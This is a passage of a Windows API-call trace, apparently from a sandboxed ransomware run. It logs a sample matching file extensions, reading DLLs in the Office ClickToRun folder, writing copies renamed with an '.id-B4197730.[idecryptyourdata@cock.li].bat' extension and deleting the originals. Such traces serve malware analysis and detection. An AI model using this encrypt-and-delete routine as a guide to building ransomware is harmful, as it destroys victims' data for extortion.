[0070.662] lstrlenW (lpString=".rar") returned 4 [0070.662] lstrcmpiW (lpString1=".rar", lpString2="evtx") returned -1 [0070.662] lstrlenW (lpString=".bz2") returned 4 [0070.662] lstrcmpiW (lpString1=".bz2", lpString2="evtx") returned -1 [0070.662] lstrlenW (lpString=".7z") returned 3 [0070.662] lstrcmpiW (lpString1=".7z", lpString2="vtx") returned -1 [0070.662] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-WMI-Activity%4Operational.evtx") returned 56 [0070.662] lstrlenW (lpString=".dbf") returned 4 [0070.662] lstrcmpiW (lpString1=".dbf", lpString2="evtx") returned -1 [0070.662] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-WMI-Activity%4Operational.evtx") returned 56 [0070.662] lstrlenW (lpString=".1cd") returned 4 [0070.662] lstrcmpiW (lpString1=".1cd", lpString2="evtx") returned -1 [0070.663] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-WMI-Activity%4Operational.evtx") returned 56 [0070.663] lstrlenW (lpString=".jpg") returned 4 [0070.663] lstrcmpiW (lpString1=".jpg", lpString2="evtx") returned -1 [0070.663] lstrcmpiW (lpString1=".dll", lpString2=".bat") returned 1 [0070.663] lstrlenW (lpString="api-ms-win-core-synch-l1-2-0.dll") returned 32 [0070.663] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\api-ms-win-core-synch-l1-2-0.dll" (normalized: "c:\\program files\\common files\\microsoft shared\\clicktorun\\api-ms-win-core-synch-l1-2-0.dll"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x39c [0071.210] GetFileSizeEx (in: hFile=0x39c, lpFileSize=0x320ff14 | out: lpFileSize=0x320ff14*=19136) returned 1 [0071.210] CloseHandle (hObject=0x39c) returned 1 [0071.210] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\api-ms-win-core-synch-l1-2-0.dll" (normalized: "c:\\program files\\common files\\microsoft shared\\clicktorun\\api-ms-win-core-synch-l1-2-0.dll")) returned 0x20 [0071.210] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\api-ms-win-core-synch-l1-2-0.dll.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\common files\\microsoft shared\\clicktorun\\api-ms-win-core-synch-l1-2-0.dll.id-b4197730.[idecryptyourdata@cock.li].bat")) returned 0xffffffff [0071.210] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\api-ms-win-core-synch-l1-2-0.dll" (normalized: "c:\\program files\\common files\\microsoft shared\\clicktorun\\api-ms-win-core-synch-l1-2-0.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x39c [0071.210] SetFilePointerEx (in: hFile=0x39c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x320fec0 | out: lpNewFilePointer=0x0) returned 1 [0071.210] SetFilePointerEx (in: hFile=0x39c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x320fec0 | out: lpNewFilePointer=0x0) returned 1 [0071.210] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\api-ms-win-core-synch-l1-2-0.dll.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\common files\\microsoft shared\\clicktorun\\api-ms-win-core-synch-l1-2-0.dll.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x388 [0071.211] GetLastError () returned 0x0 [0071.211] ReadFile (in: hFile=0x39c, lpBuffer=0x3f14020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x320fecc, lpOverlapped=0x0 | out: lpBuffer=0x3f14020*, lpNumberOfBytesRead=0x320fecc*=0x4ac0, lpOverlapped=0x0) returned 1 [0071.212] WriteFile (in: hFile=0x388, lpBuffer=0x3f14020*, nNumberOfBytesToWrite=0x4ad0, lpNumberOfBytesWritten=0x320fc94, lpOverlapped=0x0 | out: lpBuffer=0x3f14020*, lpNumberOfBytesWritten=0x320fc94*=0x4ad0, lpOverlapped=0x0) returned 1 [0071.214] ReadFile (in: hFile=0x39c, lpBuffer=0x3f14020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x320fecc, lpOverlapped=0x0 | out: lpBuffer=0x3f14020*, lpNumberOfBytesRead=0x320fecc*=0x0, lpOverlapped=0x0) returned 1 [0071.214] WriteFile (in: hFile=0x388, lpBuffer=0x3f14020*, nNumberOfBytesToWrite=0x114, lpNumberOfBytesWritten=0x320fc94, lpOverlapped=0x0 | out: lpBuffer=0x3f14020*, lpNumberOfBytesWritten=0x320fc94*=0x114, lpOverlapped=0x0) returned 1 [0071.214] SetEndOfFile (hFile=0x388) returned 1 [0071.214] CloseHandle (hObject=0x388) returned 1 [0071.214] SetFilePointerEx (in: hFile=0x39c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x320fec0 | out: lpNewFilePointer=0x0) returned 1 [0071.214] SetEndOfFile (hFile=0x39c) returned 1 [0071.215] CloseHandle (hObject=0x39c) returned 1 [0071.215] SetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\api-ms-win-core-synch-l1-2-0.dll.id-B4197730.[idecryptyourdata@cock.li].bat", dwFileAttributes=0x20) returned 1 [0071.215] DeleteFileW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\api-ms-win-core-synch-l1-2-0.dll" (normalized: "c:\\program files\\common files\\microsoft shared\\clicktorun\\api-ms-win-core-synch-l1-2-0.dll")) returned 1 [0071.216] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\api-ms-win-core-synch-l1-2-0.dll") returned 90 [0071.216] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\api-ms-win-core-synch-l1-2-0.dll") returned 90 [0071.216] lstrlenW (lpString=".doc") returned 4 [0071.216] lstrcmpiW (lpString1=".doc", lpString2=".dll") returned 1 [0071.216] lstrlenW (lpString=".docx") returned 5 [0071.216] lstrcmpiW (lpString1=".docx", lpString2="0.dll") returned -1 [0071.216] lstrlenW (lpString=".pdf") returned 4 [0071.216] lstrcmpiW (lpString1=".pdf", lpString2=".dll") returned 1 [0071.216] lstrlenW (lpString=".xls") returned 4 [0071.216] lstrcmpiW (lpString1=".xls", lpString2=".dll") returned 1 [0071.216] lstrlenW (lpString=".xlsx") returned 5 [0071.216] lstrcmpiW (lpString1=".xlsx", lpString2="0.dll") returned -1 [0071.216] lstrlenW (lpString=".ppt") returned 4 [0071.216] lstrcmpiW (lpString1=".ppt", lpString2=".dll") returned 1 [0071.216] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\api-ms-win-core-synch-l1-2-0.dll") returned 90 [0071.216] lstrlenW (lpString=".zip") returned 4 [0071.217] lstrcmpiW (lpString1=".zip", lpString2=".dll") returned 1 [0071.217] lstrlenW (lpString=".rar") returned 4 [0071.217] lstrcmpiW (lpString1=".rar", lpString2=".dll") returned 1 [0071.217] lstrlenW (lpString=".bz2") returned 4 [0071.217] lstrcmpiW (lpString1=".bz2", lpString2=".dll") returned -1 [0071.217] lstrlenW (lpString=".7z") returned 3 [0071.217] lstrcmpiW (lpString1=".7z", lpString2="dll") returned -1 [0071.217] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\api-ms-win-core-synch-l1-2-0.dll") returned 90 [0071.217] lstrlenW (lpString=".dbf") returned 4 [0071.217] lstrcmpiW (lpString1=".dbf", lpString2=".dll") returned -1 [0071.217] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\api-ms-win-core-synch-l1-2-0.dll") returned 90 [0071.217] lstrlenW (lpString=".1cd") returned 4 [0071.217] lstrcmpiW (lpString1=".1cd", lpString2=".dll") returned -1 [0071.217] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\api-ms-win-core-synch-l1-2-0.dll") returned 90 [0071.217] lstrlenW (lpString=".jpg") returned 4 [0071.217] lstrcmpiW (lpString1=".jpg", lpString2=".dll") returned 1 [0071.217] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\api-ms-win-core-synch-l1-2-0.dll") returned 90 [0071.217] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\api-ms-win-core-synch-l1-2-0.dll") returned 90 [0071.217] lstrlenW (lpString=".doc") returned 4 [0071.217] lstrcmpiW (lpString1=".doc", lpString2=".dll") returned 1 [0071.217] lstrlenW (lpString=".docx") returned 5 [0071.217] lstrcmpiW (lpString1=".docx", lpString2="0.dll") returned -1 [0071.217] lstrlenW (lpString=".pdf") returned 4 [0071.217] lstrcmpiW (lpString1=".pdf", lpString2=".dll") returned 1 [0071.217] lstrlenW (lpString=".xls") returned 4 [0071.217] lstrcmpiW (lpString1=".xls", lpString2=".dll") returned 1 [0071.217] lstrlenW (lpString=".xlsx") returned 5 [0071.217] lstrcmpiW (lpString1=".xlsx", lpString2="0.dll") returned -1 [0071.218] lstrlenW (lpString=".ppt") returned 4 [0071.218] lstrcmpiW (lpString1=".ppt", lpString2=".dll") returned 1 [0071.218] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\api-ms-win-core-synch-l1-2-0.dll") returned 90 [0071.218] lstrlenW (lpString=".zip") returned 4 [0071.218] lstrcmpiW (lpString1=".zip", lpString2=".dll") returned 1 [0071.218] lstrlenW (lpString=".rar") returned 4 [0071.218] lstrcmpiW (lpString1=".rar", lpString2=".dll") returned 1 [0071.218] lstrlenW (lpString=".bz2") returned 4 [0071.218] lstrcmpiW (lpString1=".bz2", lpString2=".dll") returned -1 [0071.218] lstrlenW (lpString=".7z") returned 3 [0071.218] lstrcmpiW (lpString1=".7z", lpString2="dll") returned -1 [0071.218] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\api-ms-win-core-synch-l1-2-0.dll") returned 90 [0071.218] lstrlenW (lpString=".dbf") returned 4 [0071.218] lstrcmpiW (lpString1=".dbf", lpString2=".dll") returned -1 [0071.218] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\api-ms-win-core-synch-l1-2-0.dll") returned 90 [0071.218] lstrlenW (lpString=".1cd") returned 4 [0071.218] lstrcmpiW (lpString1=".1cd", lpString2=".dll") returned -1 [0071.218] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\api-ms-win-core-synch-l1-2-0.dll") returned 90 [0071.218] lstrlenW (lpString=".jpg") returned 4 [0071.218] lstrcmpiW (lpString1=".jpg", lpString2=".dll") returned 1 [0071.218] lstrcmpiW (lpString1=".dll", lpString2=".bat") returned 1 [0071.218] lstrlenW (lpString="api-ms-win-core-timezone-l1-1-0.dll") returned 35 [0071.218] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\api-ms-win-core-timezone-l1-1-0.dll" (normalized: "c:\\program files\\common files\\microsoft shared\\clicktorun\\api-ms-win-core-timezone-l1-1-0.dll"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x39c [0071.219] GetFileSizeEx (in: hFile=0x39c, lpFileSize=0x320ff14 | out: lpFileSize=0x320ff14*=18624) returned 1 [0071.219] CloseHandle (hObject=0x39c) returned 1 [0071.219] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\api-ms-win-core-timezone-l1-1-0.dll" (normalized: "c:\\program files\\common files\\microsoft shared\\clicktorun\\api-ms-win-core-timezone-l1-1-0.dll")) returned 0x20 [0071.219] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\api-ms-win-core-timezone-l1-1-0.dll.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\common files\\microsoft shared\\clicktorun\\api-ms-win-core-timezone-l1-1-0.dll.id-b4197730.[idecryptyourdata@cock.li].bat")) returned 0xffffffff [0071.220] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\api-ms-win-core-timezone-l1-1-0.dll" (normalized: "c:\\program files\\common files\\microsoft shared\\clicktorun\\api-ms-win-core-timezone-l1-1-0.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x39c [0071.220] SetFilePointerEx (in: hFile=0x39c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x320fec0 | out: lpNewFilePointer=0x0) returned 1 [0071.220] SetFilePointerEx (in: hFile=0x39c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x320fec0 | out: lpNewFilePointer=0x0) returned 1 [0071.220] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\api-ms-win-core-timezone-l1-1-0.dll.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\common files\\microsoft shared\\clicktorun\\api-ms-win-core-timezone-l1-1-0.dll.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x388 [0071.220] GetLastError () returned 0x0 [0071.220] ReadFile (in: hFile=0x39c, lpBuffer=0x3f14020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x320fecc, lpOverlapped=0x0 | out: lpBuffer=0x3f14020*, lpNumberOfBytesRead=0x320fecc*=0x48c0, lpOverlapped=0x0) returned 1 [0071.222] WriteFile (in: hFile=0x388, lpBuffer=0x3f14020*, nNumberOfBytesToWrite=0x48d0, lpNumberOfBytesWritten=0x320fc94, lpOverlapped=0x0 | out: lpBuffer=0x3f14020*, lpNumberOfBytesWritten=0x320fc94*=0x48d0, lpOverlapped=0x0) returned 1 [0071.224] ReadFile (in: hFile=0x39c, lpBuffer=0x3f14020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x320fecc, lpOverlapped=0x0 | out: lpBuffer=0x3f14020*, lpNumberOfBytesRead=0x320fecc*=0x0, lpOverlapped=0x0) returned 1 [0071.224] WriteFile (in: hFile=0x388, lpBuffer=0x3f14020*, nNumberOfBytesToWrite=0x11a, lpNumberOfBytesWritten=0x320fc94, lpOverlapped=0x0 | out: lpBuffer=0x3f14020*, lpNumberOfBytesWritten=0x320fc94*=0x11a, lpOverlapped=0x0) returned 1 [0071.224] SetEndOfFile (hFile=0x388) returned 1 [0071.224] CloseHandle (hObject=0x388) returned 1 [0071.224] SetFilePointerEx (in: hFile=0x39c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x320fec0 | out: lpNewFilePointer=0x0) returned 1 [0071.224] SetEndOfFile (hFile=0x39c) returned 1 [0071.225] CloseHandle (hObject=0x39c) returned 1 [0071.225] SetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\api-ms-win-core-timezone-l1-1-0.dll.id-B4197730.[idecryptyourdata@cock.li].bat", dwFileAttributes=0x20) returned 1 [0071.225] DeleteFileW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\api-ms-win-core-timezone-l1-1-0.dll" (normalized: "c:\\program files\\common files\\microsoft shared\\clicktorun\\api-ms-win-core-timezone-l1-1-0.dll")) returned 1 [0071.226] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\api-ms-win-core-timezone-l1-1-0.dll") returned 93 [0071.226] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\api-ms-win-core-timezone-l1-1-0.dll") returned 93 [0071.226] lstrlenW (lpString=".doc") returned 4 [0071.226] lstrcmpiW (lpString1=".doc", lpString2=".dll") returned 1 [0071.226] lstrlenW (lpString=".docx") returned 5 [0071.226] lstrcmpiW (lpString1=".docx", lpString2="0.dll") returned -1 [0071.226] lstrlenW (lpString=".pdf") returned 4 [0071.226] lstrcmpiW (lpString1=".pdf", lpString2=".dll") returned 1 [0071.226] lstrlenW (lpString=".xls") returned 4 [0071.226] lstrcmpiW (lpString1=".xls", lpString2=".dll") returned 1 [0071.226] lstrlenW (lpString=".xlsx") returned 5 [0071.226] lstrcmpiW (lpString1=".xlsx", lpString2="0.dll") returned -1 [0071.226] lstrlenW (lpString=".ppt") returned 4 [0071.226] lstrcmpiW (lpString1=".ppt", lpString2=".dll") returned 1 [0071.226] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\api-ms-win-core-timezone-l1-1-0.dll") returned 93 [0071.226] lstrlenW (lpString=".zip") returned 4 [0071.226] lstrcmpiW (lpString1=".zip", lpString2=".dll") returned 1 [0071.226] lstrlenW (lpString=".rar") returned 4 [0071.226] lstrcmpiW (lpString1=".rar", lpString2=".dll") returned 1 [0071.226] lstrlenW (lpString=".bz2") returned 4 [0071.226] lstrcmpiW (lpString1=".bz2", lpString2=".dll") returned -1 [0071.226] lstrlenW (lpString=".7z") returned 3 [0071.226] lstrcmpiW (lpString1=".7z", lpString2="dll") returned -1 [0071.226] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\api-ms-win-core-timezone-l1-1-0.dll") returned 93 [0071.226] lstrlenW (lpString=".dbf") returned 4 [0071.226] lstrcmpiW (lpString1=".dbf", lpString2=".dll") returned -1 [0071.227] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\api-ms-win-core-timezone-l1-1-0.dll") returned 93 [0071.227] lstrlenW (lpString=".1cd") returned 4 [0071.227] lstrcmpiW (lpString1=".1cd", lpString2=".dll") returned -1 [0071.227] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\api-ms-win-core-timezone-l1-1-0.dll") returned 93 [0071.227] lstrlenW (lpString=".jpg") returned 4 [0071.227] lstrcmpiW (lpString1=".jpg", lpString2=".dll") returned 1 [0071.227] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\api-ms-win-core-timezone-l1-1-0.dll") returned 93 [0071.227] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\api-ms-win-core-timezone-l1-1-0.dll") returned 93 [0071.227] lstrlenW (lpString=".doc") returned 4 [0071.227] lstrcmpiW (lpString1=".doc", lpString2=".dll") returned 1 [0071.227] lstrlenW (lpString=".docx") returned 5 [0071.227] lstrcmpiW (lpString1=".docx", lpString2="0.dll") returned -1 [0071.227] lstrlenW (lpString=".pdf") returned 4 [0071.227] lstrcmpiW (lpString1=".pdf", lpString2=".dll") returned 1 [0071.227] lstrlenW (lpString=".xls") returned 4 [0071.227] lstrcmpiW (lpString1=".xls", lpString2=".dll") returned 1 [0071.227] lstrlenW (lpString=".xlsx") returned 5 [0071.227] lstrcmpiW (lpString1=".xlsx", lpString2="0.dll") returned -1 [0071.227] lstrlenW (lpString=".ppt") returned 4 [0071.227] lstrcmpiW (lpString1=".ppt", lpString2=".dll") returned 1 [0071.227] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\api-ms-win-core-timezone-l1-1-0.dll") returned 93 [0071.227] lstrlenW (lpString=".zip") returned 4 [0071.227] lstrcmpiW (lpString1=".zip", lpString2=".dll") returned 1 [0071.227] lstrlenW (lpString=".rar") returned 4 [0071.227] lstrcmpiW (lpString1=".rar", lpString2=".dll") returned 1 [0071.227] lstrlenW (lpString=".bz2") returned 4 [0071.227] lstrcmpiW (lpString1=".bz2", lpString2=".dll") returned -1 [0071.227] lstrlenW (lpString=".7z") returned 3 [0071.227] lstrcmpiW (lpString1=".7z", lpString2="dll") returned -1 [0071.228] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\api-ms-win-core-timezone-l1-1-0.dll") returned 93 [0071.228] lstrlenW (lpString=".dbf") returned 4 [0071.228] lstrcmpiW (lpString1=".dbf", lpString2=".dll") returned -1 [0071.228] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\api-ms-win-core-timezone-l1-1-0.dll") returned 93 [0071.228] lstrlenW (lpString=".1cd") returned 4 [0071.228] lstrcmpiW (lpString1=".1cd", lpString2=".dll") returned -1 [0071.228] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\api-ms-win-core-timezone-l1-1-0.dll") returned 93 [0071.228] lstrlenW (lpString=".jpg") returned 4 [0071.228] lstrcmpiW (lpString1=".jpg", lpString2=".dll") returned 1 [0071.228] lstrcmpiW (lpString1=".dll", lpString2=".bat") returned 1 [0071.228] lstrlenW (lpString="api-ms-win-core-xstate-l2-1-0.dll") returned 33 [0071.228] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\api-ms-win-core-xstate-l2-1-0.dll" (normalized: "c:\\program files\\common files\\microsoft shared\\clicktorun\\api-ms-win-core-xstate-l2-1-0.dll"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x39c [0071.228] GetFileSizeEx (in: hFile=0x39c, lpFileSize=0x320ff14 | out: lpFileSize=0x320ff14*=11616) returned 1 [0071.229] CloseHandle (hObject=0x39c) returned 1 [0071.229] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\api-ms-win-core-xstate-l2-1-0.dll" (normalized: "c:\\program files\\common files\\microsoft shared\\clicktorun\\api-ms-win-core-xstate-l2-1-0.dll")) returned 0x20 [0071.229] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\api-ms-win-core-xstate-l2-1-0.dll.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\common files\\microsoft shared\\clicktorun\\api-ms-win-core-xstate-l2-1-0.dll.id-b4197730.[idecryptyourdata@cock.li].bat")) returned 0xffffffff [0071.229] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\api-ms-win-core-xstate-l2-1-0.dll" (normalized: "c:\\program files\\common files\\microsoft shared\\clicktorun\\api-ms-win-core-xstate-l2-1-0.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x39c [0071.229] SetFilePointerEx (in: hFile=0x39c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x320fec0 | out: lpNewFilePointer=0x0) returned 1 [0071.229] SetFilePointerEx (in: hFile=0x39c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x320fec0 | out: lpNewFilePointer=0x0) returned 1 [0071.229] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\api-ms-win-core-xstate-l2-1-0.dll.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\common files\\microsoft shared\\clicktorun\\api-ms-win-core-xstate-l2-1-0.dll.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x388 [0071.229] GetLastError () returned 0x0 [0071.230] ReadFile (in: hFile=0x39c, lpBuffer=0x3f14020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x320fecc, lpOverlapped=0x0 | out: lpBuffer=0x3f14020*, lpNumberOfBytesRead=0x320fecc*=0x2d60, lpOverlapped=0x0) returned 1 [0071.231] WriteFile (in: hFile=0x388, lpBuffer=0x3f14020*, nNumberOfBytesToWrite=0x2d70, lpNumberOfBytesWritten=0x320fc94, lpOverlapped=0x0 | out: lpBuffer=0x3f14020*, lpNumberOfBytesWritten=0x320fc94*=0x2d70, lpOverlapped=0x0) returned 1 [0071.233] ReadFile (in: hFile=0x39c, lpBuffer=0x3f14020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x320fecc, lpOverlapped=0x0 | out: lpBuffer=0x3f14020*, lpNumberOfBytesRead=0x320fecc*=0x0, lpOverlapped=0x0) returned 1 [0071.233] WriteFile (in: hFile=0x388, lpBuffer=0x3f14020*, nNumberOfBytesToWrite=0x116, lpNumberOfBytesWritten=0x320fc94, lpOverlapped=0x0 | out: lpBuffer=0x3f14020*, lpNumberOfBytesWritten=0x320fc94*=0x116, lpOverlapped=0x0) returned 1 [0071.233] SetEndOfFile (hFile=0x388) returned 1 [0071.233] CloseHandle (hObject=0x388) returned 1 [0071.233] SetFilePointerEx (in: hFile=0x39c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x320fec0 | out: lpNewFilePointer=0x0) returned 1 [0071.233] SetEndOfFile (hFile=0x39c) returned 1 [0071.234] CloseHandle (hObject=0x39c) returned 1 [0071.234] SetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\api-ms-win-core-xstate-l2-1-0.dll.id-B4197730.[idecryptyourdata@cock.li].bat", dwFileAttributes=0x20) returned 1 [0071.234] DeleteFileW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\api-ms-win-core-xstate-l2-1-0.dll" (normalized: "c:\\program files\\common files\\microsoft shared\\clicktorun\\api-ms-win-core-xstate-l2-1-0.dll")) returned 1 [0071.235] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\api-ms-win-core-xstate-l2-1-0.dll") returned 91 [0071.235] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\api-ms-win-core-xstate-l2-1-0.dll") returned 91 [0071.235] lstrlenW (lpString=".doc") returned 4 [0071.235] lstrcmpiW (lpString1=".doc", lpString2=".dll") returned 1 [0071.235] lstrlenW (lpString=".docx") returned 5 [0071.235] lstrcmpiW (lpString1=".docx", lpString2="0.dll") returned -1 [0071.235] lstrlenW (lpString=".pdf") returned 4 [0071.235] lstrcmpiW (lpString1=".pdf", lpString2=".dll") returned 1 [0071.235] lstrlenW (lpString=".xls") returned 4 [0071.235] lstrcmpiW (lpString1=".xls", lpString2=".dll") returned 1 [0071.235] lstrlenW (lpString=".xlsx") returned 5 [0071.235] lstrcmpiW (lpString1=".xlsx", lpString2="0.dll") returned -1 [0071.235] lstrlenW (lpString=".ppt") returned 4 [0071.235] lstrcmpiW (lpString1=".ppt", lpString2=".dll") returned 1 [0071.235] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\api-ms-win-core-xstate-l2-1-0.dll") returned 91 [0071.235] lstrlenW (lpString=".zip") returned 4 [0071.235] lstrcmpiW (lpString1=".zip", lpString2=".dll") returned 1 [0071.235] lstrlenW (lpString=".rar") returned 4 [0071.235] lstrcmpiW (lpString1=".rar", lpString2=".dll") returned 1 [0071.235] lstrlenW (lpString=".bz2") returned 4 [0071.235] lstrcmpiW (lpString1=".bz2", lpString2=".dll") returned -1 [0071.235] lstrlenW (lpString=".7z") returned 3 [0071.235] lstrcmpiW (lpString1=".7z", lpString2="dll") returned -1 [0071.235] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\api-ms-win-core-xstate-l2-1-0.dll") returned 91 [0071.235] lstrlenW (lpString=".dbf") returned 4 [0071.235] lstrcmpiW (lpString1=".dbf", lpString2=".dll") returned -1 [0071.235] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\api-ms-win-core-xstate-l2-1-0.dll") returned 91 [0071.235] lstrlenW (lpString=".1cd") returned 4 [0071.235] lstrcmpiW (lpString1=".1cd", lpString2=".dll") returned -1 [0071.236] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\api-ms-win-core-xstate-l2-1-0.dll") returned 91 [0071.236] lstrlenW (lpString=".jpg") returned 4 [0071.236] lstrcmpiW (lpString1=".jpg", lpString2=".dll") returned 1 [0071.236] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\api-ms-win-core-xstate-l2-1-0.dll") returned 91 [0071.236] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\api-ms-win-core-xstate-l2-1-0.dll") returned 91 [0071.236] lstrlenW (lpString=".doc") returned 4 [0071.236] lstrcmpiW (lpString1=".doc", lpString2=".dll") returned 1 [0071.236] lstrlenW (lpString=".docx") returned 5 [0071.236] lstrcmpiW (lpString1=".docx", lpString2="0.dll") returned -1 [0071.236] lstrlenW (lpString=".pdf") returned 4 [0071.236] lstrcmpiW (lpString1=".pdf", lpString2=".dll") returned 1 [0071.236] lstrlenW (lpString=".xls") returned 4 [0071.236] lstrcmpiW (lpString1=".xls", lpString2=".dll") returned 1 [0071.236] 